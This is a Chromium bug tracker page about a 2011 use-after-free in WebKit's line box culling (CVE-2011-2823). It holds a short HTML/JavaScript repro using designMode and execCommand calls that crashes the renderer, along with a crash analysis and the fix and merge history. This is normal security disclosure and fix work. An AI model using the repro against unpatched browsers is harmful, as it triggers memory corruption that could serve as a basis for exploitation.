New issue
Advanced search Search tips
Note: Color blocks (like or ) mean that a user may not be available. Tooltip shows the reason.
Starred by 1 user
Status: Fixed
Owner: ----
Closed: Jul 2011
Cc:
Components:
EstimatedDays: ----
NextAction: ----
OS: All
Pri: 1
Type: Bug-Security

Restricted
  • Only users with EditIssue permission may comment.



Sign in to add a comment
REGRESSION (83075): Use after free in line box culling optimization
Reported by skylined@chromium.org, May 13 2011 Back to list
Just found this and I'm dumping it before the weekend starts in MTV (in case somebody has time to have a look). I'm rebuilding Chrome and it's after work hours, so I won't look at this myself until Monday.

Repro:

<head>
  <script>
    function f() {
      document.designMode="on";
      document.execCommand("SelectAll");
      document.execCommand("InsertImage",false);
      document.execCommand("InsertImage",false);
      document.execCommand("Indent");
      document.execCommand("insertunorderedlist",false);
      document.execCommand("InsertUnorderedList",false);
      document.execCommand("Bold");
      document.execCommand("InsertLineBreak");
      document.execCommand("insertunorderedlist");
      document.execCommand("insertimage",false);
      document.execCommand("insertparagraph",false);
      document.execCommand("insertunorderedlist");
      document.execCommand("InsertUnorderedList");
      document.execCommand("Outdent");
    }
  </script>
</head>
<body onload='f();'><pre id="x">x</pre></body>

<head>
  <script>
    function f() {
      document.designMode="on";
      document.execCommand("SelectAll");
      document.execCommand("InsertImage",false);
      document.execCommand("InsertImage",false);
      document.execCommand("Indent");
      document.execCommand("insertunorderedlist",false);
      document.execCommand("InsertUnorderedList",false);
      document.execCommand("Bold");
      document.execCommand("InsertLineBreak");
      document.execCommand("insertunorderedlist");
      document.execCommand("insertimage",false);
      document.execCommand("insertparagraph",false);
      document.execCommand("insertunorderedlist");
      document.execCommand("InsertUnorderedList");
      document.execCommand("Outdent");
    }
  </script>
</head>
<body onload='f();'><pre id="x">x</pre></body>

id:             chrome.dll!WebCore::requiresLineBox ExecAV@Arbitrary (a1b2d0b7782629a1c77ca95cb118a6fb)
description:    Security: Attempt to execute non-executable arbitrary memory (@0x013906EC) in chrome.dll!WebCore::requiresLineBox
note:           Based on this information, this is expected to be a security issue!
stack:          chrome.dll!WebCore::requiresLineBox
                chrome.dll!WebCore::RenderBlock::skipLeadingWhitespace
                chrome.dll!WebCore::RenderBlock::findNextLineBreak
                chrome.dll!WebCore::RenderBlock::layoutRunsAndFloats
                chrome.dll!WebCore::RenderBlock::layoutInlineChildren
                chrome.dll!WebCore::RenderBlock::layoutBlock
                chrome.dll!WebCore::RenderBlock::layout
                chrome.dll!WebCore::RenderBlock::layoutBlockChild
                chrome.dll!WebCore::RenderBlock::layoutBlockChildren
                chrome.dll!WebCore::RenderBlock::layoutBlock
                chrome.dll!WebCore::RenderBlock::layout
                chrome.dll!WebCore::RenderBlock::layoutBlockChild
                chrome.dll!WebCore::RenderBlock::layoutBlockChildren
                chrome.dll!WebCore::RenderBlock::layoutBlock
                chrome.dll!WebCore::RenderBlock::layout
                chrome.dll!WebCore::RenderBlock::layoutBlockChild
                chrome.dll!WebCore::RenderBlock::layoutBlockChildren
                chrome.dll!WebCore::RenderBlock::layoutBlock
                chrome.dll!WebCore::RenderBlock::layout
                chrome.dll!WebCore::RenderBlock::layoutBlockChild
                chrome.dll!WebCore::RenderBlock::layoutBlockChildren
                chrome.dll!WebCore::RenderBlock::layoutBlock
                chrome.dll!WebCore::RenderBlock::layout
                chrome.dll!WebCore::RenderBlock::layoutBlockChild
                chrome.dll!WebCore::RenderBlock::layoutBlockChildren
                chrome.dll!WebCore::RenderBlock::layoutBlock
                chrome.dll!WebCore::RenderBlock::layout
                chrome.dll!WebCore::RenderBlock::layoutBlockChild
                chrome.dll!WebCore::RenderBlock::layoutBlockChildren
                chrome.dll!WebCore::RenderBlock::layoutBlock
                chrome.dll!WebCore::RenderBlock::layout
                chrome.dll!WebCore::RenderBlock::layoutBlockChild
                chrome.dll!WebCore::RenderBlock::layoutBlockChildren
                chrome.dll!WebCore::RenderBlock::layoutBlock
                chrome.dll!WebCore::RenderBlock::layout
                chrome.dll!WebCore::RenderView::layout
                chrome.dll!WebCore::FrameView::layout
                chrome.dll!WebCore::Document::updateLayout
                chrome.dll!WebCore::Document::updateLayoutIgnorePendingStylesheets
                chrome.dll!WebCore::VisiblePosition::canonicalPosition
                chrome.dll!WebCore::VisiblePosition::init
                chrome.dll!WebCore::VisiblePosition::VisiblePosition
                chrome.dll!WebCore::VisibleSelection::setBaseAndExtentToDeepEquivalents
                chrome.dll!WebCore::VisibleSelection::validate
                chrome.dll!WebCore::VisibleSelection::VisibleSelection
                chrome.dll!WebCore::DeleteSelectionCommand::doApply
                chrome.dll!WebCore::EditCommand::apply
                chrome.dll!WebCore::CompositeEditCommand::applyCommandToComposite
                chrome.dll!WebCore::CompositeEditCommand::deleteSelection
                chrome.dll!WebCore::CompositeEditCommand::moveParagraphs
                chrome.dll!WebCore::IndentOutdentCommand::outdentParagraph
                chrome.dll!WebCore::IndentOutdentCommand::outdentRegion
                chrome.dll!WebCore::ApplyBlockElementCommand::doApply
                chrome.dll!WebCore::EditCommand::apply
                chrome.dll!WebCore::applyCommand
                chrome.dll!WebCore::executeOutdent
                chrome.dll!WebCore::Editor::Command::execute
                chrome.dll!WebCore::Document::execCommand
                chrome.dll!WebCore::DocumentInternal::execCommandCallback
                chrome.dll!v8::internal::HandleApiCallHelper<...>
                chrome.dll!v8::internal::Builtin_HandleApiCall
                chrome.dll!v8::internal::Invoke
                chrome.dll!v8::internal::Execution::Call
                chrome.dll!v8::Script::Run
 
Upstream: https://bugs.webkit.org/show_bug.cgi?id=60778
Possibly duplicate of:  issue 78841 
Comment 2 by kareng@google.com, May 13 2011
Status: Available
Cc: -security...@gtempaccount.com rniwa@chromium.org
Labels: -Mstone-X Mstone-12
Owner: security...@gtempaccount.com
Summary: Memory corruption in editing (was: NULL)
This regressed in http://trac.webkit.org/changeset/85267,  but dev says it might not be related or potentially uncovered a sleeping problem.
Summary: REGRESSION (83075): Use after free in line box culling optimization (was: NULL)
Cc: jchaffraix@chromium.org
Labels: -Mstone-12 Mstone-13
Moving all M12 bugs to M13. We won't have another M12 patch.
Owner: security@chromium.org
Owner: jchaffraix@chromium.org
Status: Assigned
This is the last "old" WebKit bug we have on file. Julien, can you be begged to fix it since we're a bit overloaded? Or maybe if we're lucky, one of your generic layout root changes might have helped?
Owner: ----
Status: ExternalDependency
God Hyatt is fixing it.
Labels: -Restrict-View-SecurityTeam Restrict-View-SecurityNotify
Status: WillMerge
http://trac.webkit.org/changeset/91781
 Issue 90672  has been merged into this issue.
Labels: Merge-Pending
Status: FixUnreleased
Bulk move for WillMerge change.
Labels: -Merge-Pending Merge-Approved
Bulk move for WillMerge change.
Merged to M14 for baking: http://trac.webkit.org/changeset/92028
Labels: -Merge-Approved Merge-Merged
Merged to M13: http://trac.webkit.org/changeset/92501
Labels: CVE-2011-2823
Labels: SecImpacts-Stable
Batch update.
Comment 18 by cdn@chromium.org, May 15 2012
Status: Fixed
Marking old security bugs Fixed.. 
Project Member Comment 19 by bugdroid1@chromium.org, Oct 13 2012
Labels: Restrict-AddIssueComment-Commit
This issue has been closed for some time. No one will pay attention to new comments.
If you are seeing this bug or have new data, please click New Issue to start a new bug.
Project Member Comment 20 by bugdroid1@chromium.org, Mar 10 2013
Labels: -Type-Security -Area-WebKit -WebKit-Core -SecSeverity-High -Mstone-13 -SecImpacts-Stable Cr-Content Security-Impact-Stable M-13 Type-Bug-Security Cr-Content-Core Security-Severity-High
Project Member Comment 21 by bugdroid1@chromium.org, Mar 13 2013
Labels: Restrict-View-EditIssue
Project Member Comment 22 by bugdroid1@chromium.org, Mar 13 2013
Labels: -Restrict-AddIssueComment-Commit Restrict-AddIssueComment-EditIssue
Labels: -Restrict-View-SecurityNotify -Restrict-View-EditIssue
Project Member Comment 24 by bugdroid1@chromium.org, Mar 21 2013
Labels: -Security-Severity-High Security_Severity-High
Project Member Comment 25 by bugdroid1@chromium.org, Mar 21 2013
Labels: -Security-Impact-Stable Security_Impact-Stable
Project Member Comment 26 by bugdroid1@chromium.org, Apr 6 2013
Labels: -Cr-Content Cr-Blink
Project Member Comment 27 by sheriffbot@chromium.org, Oct 1 2016
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Project Member Comment 28 by sheriffbot@chromium.org, Oct 2 2016
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Labels: allpublic
Sign in to add a comment